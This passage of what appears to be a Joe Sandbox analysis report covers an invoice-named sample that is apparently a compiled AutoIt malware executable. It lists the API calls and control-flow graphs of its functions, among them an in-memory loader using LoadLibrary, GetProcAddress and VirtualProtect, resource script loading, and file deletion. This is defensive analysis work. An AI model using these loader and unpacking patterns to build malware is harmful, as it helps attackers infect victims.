ed4ad4-ed4ae1 call ed4b37 990->1006 991->974 992->974 996 f0d813-f0d816 993->996 997 f0d81b-f0d821 993->997 999 f0d831-f0d834 994->999 1000 ed4a7b-ed4a8a 994->1000 996->974 997->974 999->974 1002 f0d83a-f0d84f 999->1002 1003 f0d826-f0d82c 1000->1003 1004 ed4a90 1000->1004 1007 f0d851-f0d854 1002->1007 1008 f0d859-f0d85f 1002->1008 1003->974 1004->974 1009 ed4ae9-ed4aed 1005->1009 1013 ed4b18-ed4b1d 1006->1013 1014 ed4ae3-ed4ae7 GetNativeSystemInfo 1006->1014 1007->974 1008->974 1009->995 1012 ed4aef-ed4af2 FreeLibrary 1009->1012 1012->995 1013->1014 1014->1009
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 00ED49CD
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • GetCurrentProcess.KERNEL32(?,00F5FAEC,00000000,00000000,?), ref: 00ED4A9A
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00ED4AA1
                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00ED4AE7
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00ED4AF2
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00ED4B23
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00ED4B2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 1986165174-0
                                                                            • Opcode ID: 91a354f75afc5fd0700c9ebccf454cdcdd03d60c1dabbf88cacb4d30ac7b217c
                                                                            • Instruction ID: ecc98092b43bb02f533ce0403c167a3addf03800b99bc013aa9e9e77cc26d930
                                                                            • Opcode Fuzzy Hash: 91a354f75afc5fd0700c9ebccf454cdcdd03d60c1dabbf88cacb4d30ac7b217c
                                                                            • Instruction Fuzzy Hash: 1A91C3719897C4DFC731DB6885501AABFF5AF3A300B4859AFD0C7A3B81E230A509E759
                                                                            Function 00ED4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1045 ed4e89-ed4ea1 CreateStreamOnHGlobal 1046 ed4ec1-ed4ec6 1045->1046 1047 ed4ea3-ed4eba FindResourceExW 1045->1047 1048 f0d933-f0d942 LoadResource 1047->1048 1049 ed4ec0 1047->1049 1048->1049 1050 f0d948-f0d956 SizeofResource 1048->1050 1049->1046 1050->1049 1051 f0d95c-f0d967 LockResource 1050->1051 1051->1049 1052 f0d96d-f0d98b 1051->1052 1052->1049
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00ED4E99
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00ED4D8E,?,?,00000000,00000000), ref: 00ED4EB0
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00ED4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00ED4E2F), ref: 00F0D937
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00ED4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00ED4E2F), ref: 00F0D94C
                                                                            • LockResource.KERNEL32(00ED4D8E,?,?,00ED4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00ED4E2F,00000000), ref: 00F0D95F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: bf246876096f3a595cb635bc322313061b6569d81261b17f8ae7d36a6a7bea91
                                                                            • Instruction ID: 568ee854ab60a10dc987e4c06a6dab963d8f0cc152c17f925db2558d9163754d
                                                                            • Opcode Fuzzy Hash: bf246876096f3a595cb635bc322313061b6569d81261b17f8ae7d36a6a7bea91
                                                                            • Instruction Fuzzy Hash: 7911A0B4200704BFD7208B65EC48F677BBAFBC5B12F2042ADF905DA290DB72EC059661
                                                                            Function 01027A50 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1195 1027a50-1027a5d 1196 1027a6a-1027a6f 1195->1196 1197 1027a71 1196->1197 1198 1027a73 1197->1198 1199 1027a60-1027a65 1197->1199 1201 1027a78-1027a7a 1198->1201 1200 1027a66-1027a68 1199->1200 1200->1196 1200->1197 1202 1027a83-1027a87 1201->1202 1203 1027a7c-1027a81 1201->1203 1204 1027a94-1027a97 1202->1204 1205 1027a89 1202->1205 1203->1202 1208 1027aa0-1027aa2 1204->1208 1209 1027a99-1027a9e 1204->1209 1206 1027ab3-1027ab8 1205->1206 1207 1027a8b-1027a92 1205->1207 1210 1027aba-1027ac3 1206->1210 1211 1027acb-1027acd 1206->1211 1207->1204 1207->1206 1208->1201 1209->1208 1212 1027ac5-1027ac9 1210->1212 1213 1027b3a-1027b3d 1210->1213 1214 1027ad6 1211->1214 1215 1027acf-1027ad4 1211->1215 1212->1214 1216 1027b42-1027b45 1213->1216 1217 1027aa4-1027aa6 1214->1217 1218 1027ad8-1027adb 1214->1218 1215->1214 1221 1027b47-1027b49 1216->1221 1219 1027aa8-1027aad 1217->1219 1220 1027aaf-1027ab1 1217->1220 1222 1027ae4 1218->1222 1223 1027add-1027ae2 1218->1223 1219->1220 1225 1027b05-1027b14 1220->1225 1221->1216 1226 1027b4b-1027b4e 1221->1226 1222->1217 1224 1027ae6-1027ae8 1222->1224 1223->1222 1228 1027af1-1027af5 1224->1228 1229 1027aea-1027aef 1224->1229 1230 1027b16-1027b1d 1225->1230 1231 1027b24-1027b31 1225->1231 1226->1216 1227 1027b50-1027b6c 1226->1227 1227->1221 1232 1027b6e 1227->1232 1228->1224 1233 1027af7 1228->1233 1229->1228 1230->1230 1234 1027b1f 1230->1234 1231->1231 1235 1027b33-1027b35 1231->1235 1236 1027b74-1027b78 1232->1236 1237 1027b02 1233->1237 1238 1027af9-1027b00 1233->1238 1234->1200 1235->1200 1239 1027b7a-1027b90 LoadLibraryA 1236->1239 1240 1027bbf-1027bc2 1236->1240 1237->1225 1238->1224 1238->1237 1241 1027b91-1027b96 1239->1241 1242 1027bc5-1027bcc 1240->1242 1241->1236 1243 1027b98-1027b9a 1241->1243 1244 1027bf0-1027c20 VirtualProtect * 2 1242->1244 1245 1027bce-1027bd0 1242->1245 1247 1027ba3-1027bb0 GetProcAddress 1243->1247 1248 1027b9c-1027ba2 1243->1248 1246 1027c24-1027c28 1244->1246 1249 1027bd2-1027be1 1245->1249 1250 1027be3-1027bee 1245->1250 1246->1246 1251 1027c2a 1246->1251 1252 1027bb2-1027bb7 1247->1252 1253 1027bb9 ExitProcess 1247->1253 1248->1247 1249->1242 1250->1249 1252->1241
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?), ref: 01027B8A
                                                                            • GetProcAddress.KERNEL32(?,01020FF9), ref: 01027BA8
                                                                            • ExitProcess.KERNEL32(?,01020FF9), ref: 01027BB9
                                                                            • VirtualProtect.KERNELBASE(00ED0000,00001000,00000004,?,00000000), ref: 01027C07
                                                                            • VirtualProtect.KERNELBASE(00ED0000,00001000), ref: 01027C1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                            • String ID:
                                                                            • API String ID: 1996367037-0
                                                                            • Opcode ID: 0888fc5ea049e5a2257388f8e934b2457a7b2e5464d23d15f05baead474ea5c9
                                                                            • Instruction ID: 8a7ebc9f5735ec7c9d19987af6a8995b3d5a558b4aa528b315c3d393c01148ea
                                                                            • Opcode Fuzzy Hash: 0888fc5ea049e5a2257388f8e934b2457a7b2e5464d23d15f05baead474ea5c9
                                                                            • Instruction Fuzzy Hash: 2D511A72A443725BD7228EBCCCC07A5BBE5EBA123471C07B9DAE1C73C6E7A459058760
                                                                            Function 00EDFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID:
                                                                            • API String ID: 3964851224-0
                                                                            • Opcode ID: b184f13f1f88126c5841e77851013850f42bad47159e734dc877c674127d9920
                                                                            • Instruction ID: c559046b2e4d7cf259eaf4478ebbf66b501eaa963080d74703dc0cf8ff339b67
                                                                            • Opcode Fuzzy Hash: b184f13f1f88126c5841e77851013850f42bad47159e734dc877c674127d9920
                                                                            • Instruction Fuzzy Hash: D1927C70A083858FD720DF15C480B6AB7E1FF85314F14992DE88AAB352D7B5EC85DB92
                                                                            Function 00F3445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00F0E398), ref: 00F3446A
                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00F3447B
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3448B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: 3cf411d1edd4194d962647e4af14c6aacefb3077df62339913a64ddef706e4d8
                                                                            • Instruction ID: 659d93d385d72bb2a59e247afa32e2f972ce8e4d2dac07d57616a8ad631609c6
                                                                            • Opcode Fuzzy Hash: 3cf411d1edd4194d962647e4af14c6aacefb3077df62339913a64ddef706e4d8
                                                                            • Instruction Fuzzy Hash: 74E0D873810604A75210AB38EC0D4E97B5C9F05336F100765FE35C20E0E7747904B696
                                                                            Function 00EE09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EE0A5B
                                                                            • timeGetTime.WINMM ref: 00EE0D16
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EE0E53
                                                                            • Sleep.KERNEL32(0000000A), ref: 00EE0E61
                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00EE0EFA
                                                                            • DestroyWindow.USER32 ref: 00EE0F06
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EE0F20
                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00F14E83
                                                                            • TranslateMessage.USER32(?), ref: 00F15C60
                                                                            • DispatchMessageW.USER32(?), ref: 00F15C6E
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F15C82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                            • API String ID: 4212290369-3242690629
                                                                            • Opcode ID: 6075b84c24036ad335bf4e1d5674b03a90e7bdbb74bf6828b1a9d31deb4b2f2a
                                                                            • Instruction ID: c8d579e25d5ea360e30eafef08f32f7c35b8b9662d2797098e92dfd9b48b5dfa
                                                                            • Opcode Fuzzy Hash: 6075b84c24036ad335bf4e1d5674b03a90e7bdbb74bf6828b1a9d31deb4b2f2a
                                                                            • Instruction Fuzzy Hash: 2FB21470608785DFDB24DF24C884BAAB7E0FF84714F14491EE599A72A1C770E8C5EB82
                                                                            Function 00F39155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00F38F5F: __time64.LIBCMT ref: 00F38F69
                                                                              • Part of subcall function 00ED4EE5: _fseek.LIBCMT ref: 00ED4EFD
                                                                            • __wsplitpath.LIBCMT ref: 00F39234
                                                                              • Part of subcall function 00EF40FB: __wsplitpath_helper.LIBCMT ref: 00EF413B
                                                                            • _wcscpy.LIBCMT ref: 00F39247
                                                                            • _wcscat.LIBCMT ref: 00F3925A
                                                                            • __wsplitpath.LIBCMT ref: 00F3927F
                                                                            • _wcscat.LIBCMT ref: 00F39295
                                                                            • _wcscat.LIBCMT ref: 00F392A8
                                                                              • Part of subcall function 00F38FA5: _memmove.LIBCMT ref: 00F38FDE
                                                                              • Part of subcall function 00F38FA5: _memmove.LIBCMT ref: 00F38FED
                                                                            • _wcscmp.LIBCMT ref: 00F391EF
                                                                              • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39824
                                                                              • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39837
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F39452
                                                                            • _wcsncpy.LIBCMT ref: 00F394C5
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00F394FB
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F39511
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39522
                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39534
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            • Opcode ID: 670161d5c923aa0c2fe297b81d196c8e11b6c05b87540b3ad344608130159aef
                                                                            • Instruction ID: 69c4382914032e12bc90243c346b0ed38482d19182018b7e15f5a603257387ac
                                                                            • Opcode Fuzzy Hash: 670161d5c923aa0c2fe297b81d196c8e11b6c05b87540b3ad344608130159aef
                                                                            • Instruction Fuzzy Hash: 67C14CB1D04219ABDF21DFA4CC85EEEB7BCEF55310F0040AAF609E6251DB709A859F61
                                                                            Function 00ED708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00ED4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F952F8,?,00ED37AE,?), ref: 00ED4724
                                                                              • Part of subcall function 00EF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00ED7165), ref: 00EF052D
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00ED71A8
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F0E8C8
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F0E909
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F0E947
                                                                            • _wcscat.LIBCMT ref: 00F0E9A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: 70c364371ac9165f182b6d228153e703148f1b55b95c69f58d811748425f9ed4
                                                                            • Instruction ID: 2bf7aad51b00c15ad5053780fe87ae25728bbc80399de0625e25cbd7988f536f
                                                                            • Opcode Fuzzy Hash: 70c364371ac9165f182b6d228153e703148f1b55b95c69f58d811748425f9ed4
                                                                            • Instruction Fuzzy Hash: FB718D725083059ECB00EF25EC419ABBBE8FF89350F40192FF585D72A1EB719949EB52
                                                                            Function 00ED3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00ED3A50
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00ED3A5F
                                                                            • LoadIconW.USER32(00000063), ref: 00ED3A76
                                                                            • LoadIconW.USER32(000000A4), ref: 00ED3A88
                                                                            • LoadIconW.USER32(000000A2), ref: 00ED3A9A
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00ED3AC0
                                                                            • RegisterClassExW.USER32(?), ref: 00ED3B16
                                                                              • Part of subcall function 00ED3041: GetSysColorBrush.USER32(0000000F), ref: 00ED3074
                                                                              • Part of subcall function 00ED3041: RegisterClassExW.USER32(00000030), ref: 00ED309E
                                                                              • Part of subcall function 00ED3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED30AF
                                                                              • Part of subcall function 00ED3041: LoadIconW.USER32(000000A9), ref: 00ED30F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 2880975755-4155596026
                                                                            • Opcode ID: f3f72b16d16bd157899ecc90bfbfb6253ef1667997993e196449754af5e692ba
                                                                            • Instruction ID: 06be64372311c4ddf6d0936de577fa4c1e6fc1c5f76f75d121263ee63dcc7035
                                                                            • Opcode Fuzzy Hash: f3f72b16d16bd157899ecc90bfbfb6253ef1667997993e196449754af5e692ba
                                                                            • Instruction Fuzzy Hash: 6F2128B1D0070CAFEB12DFA4EC49B9D7BB4FB08B11F1001ABF604A62A1D3B55654AF94
                                                                            Function 00ED3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                            • API String ID: 1825951767-3513169116
                                                                            • Opcode ID: fe14b60901aca3d1273a3a0acc040f31d7d9f84456d56f5e6535c685cf0c8b3f
                                                                            • Instruction ID: adc706b2f275c6cc8103ef57912234199ff32ebb176e982b7bdc03f83a39e8d6
                                                                            • Opcode Fuzzy Hash: fe14b60901aca3d1273a3a0acc040f31d7d9f84456d56f5e6535c685cf0c8b3f
                                                                            • Instruction Fuzzy Hash: 2BA17F7191021D9ADF05EBA4DC51AEEB7B9FF14310F00242BF815B7292EF749A0ADB61
                                                                            Function 00ED3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71registrywindowclipboardCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00ED3074
